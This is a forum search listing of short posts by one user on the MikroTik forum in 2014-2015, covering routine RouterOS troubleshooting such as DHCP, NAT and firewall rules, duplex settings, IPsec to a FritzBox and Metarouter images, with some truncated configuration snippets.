Re: Help with this configuration.

Hello,

Can you post the configuration of your firewall rules please?
by evince
Thu Apr 23, 2015 10:22 pm
Forum: General
Topic: urgent !!! help plz ... rb1100hx2 how to fix huge packet loss !!!
Replies: 11
Views: 1344

Re: urgent !!! help plz ... rb1100hx2 how to fix huge packet loss !!!

Hello,

No here it is DHCP clent, not DHCP server :)
by evince
Thu Apr 23, 2015 10:53 am
Forum: General
Topic: urgent !!! help plz ... rb1100hx2 how to fix huge packet loss !!!
Replies: 11
Views: 1344

Re: urgent !!! help plz ... rb1100hx2 how to fix huge packet loss !!!

Hello,

Take a look at /ip dhcp-client and disable it if not needed.

Kind Regards,
by evince
Tue Apr 21, 2015 4:30 pm
Forum: General
Topic: Mikrotik Router Setup
Replies: 4
Views: 593

Re: Mikrotik Router Setup

Hello,

If you want to use wirelles on your routerboard and keep DHCP server on your modem, simply use "Quick Set" in your Winbox and set the mode to Bridge.
by evince
Tue Apr 21, 2015 12:05 pm
Forum: Scripting
Topic: Update IP Address-List by DNS lookup
Replies: 4
Views: 2387

Re: Update IP Address-List by DNS lookup

Hello,

Take a look at this post : http://forum.mikrotik.com/viewtopic.php?t=82538

Bests Reards,
by evince
Tue Apr 21, 2015 10:25 am
Forum: General
Topic: dstnat issues (very strange)
Replies: 2
Views: 423

Re: dstnat issues (very strange)

Hello,

Specify the" In Interface" or " Dst Address" in you DST-NAT rule.
by evince
Tue Apr 14, 2015 5:00 pm
Forum: Beginner Basics
Topic: Basic DHCP problems
Replies: 2
Views: 632

Re: Basic DHCP problems

Hello Solaris,

Why do you have a DHCP Relay?
by evince
Tue Apr 14, 2015 11:56 am
Forum: General
Topic: IPSEC tunnel to FritzBox
Replies: 8
Views: 3119

Re: IPSEC tunnel to FritzBox

Hello,

I have been able to run VPN Ipsec between Fritzbox and Mikrotik, see this thread : http://forum.mikrotik.com/viewtopic.php?f=2&t=71987
by evince
Tue Apr 07, 2015 11:15 am
Forum: Beginner Basics
Topic: Making an IP in-accessible from the web
Replies: 2
Views: 421

Re: Making an IP in-accessible from the web

Hello, you can keep blank source address and change your chain to Forward.
by evince
Fri Apr 03, 2015 12:50 pm
Forum: Beginner Basics
Topic: RouterOS - public subnet routed and NAT-ed to internal clients
Replies: 14
Views: 3733

Re: RouterOS - public subnet routed and NAT-ed to internal clients

Hello, Simply use NAT rules as follow : /ip firewall nat add action=src-nat chain=srcnat comment="NAT clients to 2.2.2.7" src-address=\ 192.168.x.200 src-address-list=VU to-addresses=2.2.2.7 add action=src-nat chain=srcnat comment="NAT MTA" src-address=\ 192.168.x.240 src-address-list=VU to-addresse...
by evince
Thu Apr 02, 2015 11:26 am
Forum: General
Topic: Very bad Speedtest.net results through Mikrotik equipment
Replies: 15
Views: 3076

Re: Very bad Speedtest.net results through Mikrotik equipment

Hello,

try to force the duplex on your gateway interface.
by evince
Mon Mar 30, 2015 5:43 pm
Forum: General
Topic: WinBox Terminal Copying Text?
Replies: 2
Views: 1023

Re: WinBox Terminal Copying Text?

+1 already asked here, but never answered : http://forum.mikrotik.com/viewtopic.php?f=1&t=84403
by evince
Mon Mar 23, 2015 5:55 pm
Forum: General
Topic: plz Help hotspot auto login
Replies: 3
Views: 1613

Re: plz Help hotspot auto login

Hello,

Insteed of writing a script or something else, just use Mac cookie :)
by evince
Mon Mar 16, 2015 10:45 pm
Forum: General
Topic: Bug v6.28rc12
Replies: 2
Views: 1084

Bug v6.28rc12

Hi all,

With winbox 3.0rc6, when i try to edit a pppoe-client, winbox crashes. With winbox 2.2 no problem.

Thank you :)
by evince
Wed Mar 04, 2015 11:42 pm
Forum: Virtualization
Topic: Metarouter images
Replies: 365
Views: 243334

Re: Metarouter images

Hello Nathan,

With your own image all is working perfectly, thank you again :)
by evince
Wed Mar 04, 2015 11:37 pm
Forum: General
Topic: Feature request: grouping interfaces in firewall
Replies: 7
Views: 2657

Re: Feature request: grouping interfaces in firewall

+1 and address-group would be nice too :)
by evince
Thu Feb 26, 2015 11:34 am
Forum: Virtualization
Topic: Metarouter images
Replies: 365
Views: 243334

Re: Metarouter images

Hello, Any news regarding the installation of asterisk-gui? I still have the error : root@metarouter:/# opkg install asterisk-gui Installing asterisk-gui (2.1.0-rc1) to root... Downloading http://openwrt.wk.cz/attitude_adjustment/mr-mips/packages/asterisk-gui_2.1.0-rc1_mr-mips.ipk. Collected errors:...
by evince
Tue Feb 10, 2015 4:24 pm
Forum: Beginner Basics
Topic: How to block Internet on a machine except port forwarding
Replies: 2
Views: 577

Re: How to block Internet on a machine except port forwarding

Hello, Try something like this, adapt it regarding your network configuration : add chain=forward comment="TEST BLOCK WAN ACCESS" dst-port=3389 in-interface=WAN1 out-interface=bridge-local protocol=tcp add chain=forward connection-state=established in-interface=bridge-local out-interface=WAN1 add ac...
by evince
Fri Jan 30, 2015 11:55 am
Forum: The Dude
Topic: Add HTTPS to TOOLS
Replies: 1
Views: 1024

Re: Add HTTPS to TOOLS

Ok i have found a solution :

https://[Device.FirstAddress]
by evince
Fri Jan 30, 2015 11:28 am
Forum: The Dude
Topic: Add HTTPS to TOOLS
Replies: 1
Views: 1024

Add HTTPS to TOOLS

Hi all,

I'd like to know how to add an HTTPS option in Tools, i've tried [DeviceType.Url] = https://URL:443 but it does not work.

Thank you in advance for your help
by evince
Fri Jan 23, 2015 10:49 am
Forum: General
Topic: Feature Request - Block Country by IP Using Firewall
Replies: 16
Views: 9433

Re: Feature Request - Block Country by IP Using Firewall

Imagine you want to block China ... There is too many ip addresses to add
by evince
Thu Jan 22, 2015 4:07 pm
Forum: General
Topic: Feature Request - Block Country by IP Using Firewall
Replies: 16
Views: 9433

Re: Feature Request - Block Country by IP Using Firewall

+1 it coul'd be a great feature :)
by evince
Fri Jan 16, 2015 12:16 pm
Forum: General
Topic: Preventing some users on my network access to facebook
Replies: 11
Views: 1682

Re: Preventing some users on my network access to facebook

Hello,

take a look at this thread and adapt it for your configuration : https://aacable.wordpress.com/2014/02/1 ... ress-list/

Bests regards,
by evince
Thu Jan 08, 2015 12:45 pm
Forum: General
Topic: RB2011IL-N random reboots
Replies: 3
Views: 1012

Re: RB2011IL-N random reboots

Hello,

Do you have any gre-tunnels or something else?
by evince
Thu Dec 04, 2014 3:13 pm
Forum: General
Topic: VPN Help Please
Replies: 1
Views: 474

Re: VPN Help Please

Hello,

Did you add a firewall rule to permit the access?
by evince
Wed Nov 05, 2014 11:48 pm
Forum: General
Topic: v6.21.1 released
Replies: 112
Views: 27554

Re: v6.21.1 released

Where can you see this interfaces report last link up/down time and link down count ? in Terminal, '/interface print detail' Hi Chupaka, I can not see any details regarding report last link up/down time and link down count when i try to go by terminal with /interface print. Is there something else ...
by evince
Mon Nov 03, 2014 10:20 pm
Forum: General
Topic: Process logging 100% CPU
Replies: 5
Views: 1063

Re: Process logging 100% CPU

Yes, i get a timeout every command i write depending logging.
by evince
Mon Nov 03, 2014 10:20 pm
Forum: General
Topic: router was rebooted without proper shutdown - RB1100
Replies: 5
Views: 1844

Re: router was rebooted without proper shutdown - RB1100

Hello,

Same problem for me, running 6.20 .

If you find any solution :)

Thank you
by evince
Mon Nov 03, 2014 1:33 pm
Forum: General
Topic: Process logging 100% CPU
Replies: 5
Views: 1063

Re: Process logging 100% CPU

Hello,

Thank you for your help.

I can not do this because i have a blank window when i display the logging settings, nothing appears :(
by evince
Mon Nov 03, 2014 12:50 pm
Forum: General
Topic: Process logging 100% CPU
Replies: 5
Views: 1063

Process logging 100% CPU

Hi all,

I have a problem with 1 one my units. It is a RB2011UAS-RM running 6.20.

The CPU load is 100% and i can see the logging proccess using the whole cpu.

How can i stop it without rebooting the router? It is in production so i can not reboot it.

Thank you in advance.
by evince
Mon Sep 29, 2014 1:35 pm
Forum: General
Topic: RB2011UiAS - slows down to 1% of normal speed??
Replies: 5
Views: 1526

Re: RB2011UiAS - slows down to 1% of normal speed??

Hello,

Check the duplex on your WAN interface, perhaps is there a problem?
by evince
Tue Sep 02, 2014 11:28 pm
Forum: General
Topic: Forward all the port
Replies: 4
Views: 751

Re: Forward all the port

/ip firewall filter add chain=input comment="Allow ICMP" protocol=icmp src-address-list=CybNet add chain=forward comment="Forward to their firewall" dst-address=\ 192.168.254.5 dst-address-list="" add chain=input comment="Winbox Access" dst-port=8291 protocol=tcp add chain=input comment="default co...
by evince
Tue Sep 02, 2014 9:53 pm
Forum: General
Topic: Forward all the port
Replies: 4
Views: 751

Re: Forward all the port

My setup : 1 xDSL modem ==>eth1 Mikrotik (pppoe client) ==> firewall. The only probem is that my mikrotik is not pingeable from outside. In the previous configuration, there were no firewall. It has been added today. So, the customer asked me to forward all the ports to his firewall. All is working ...
  • 1
  • 2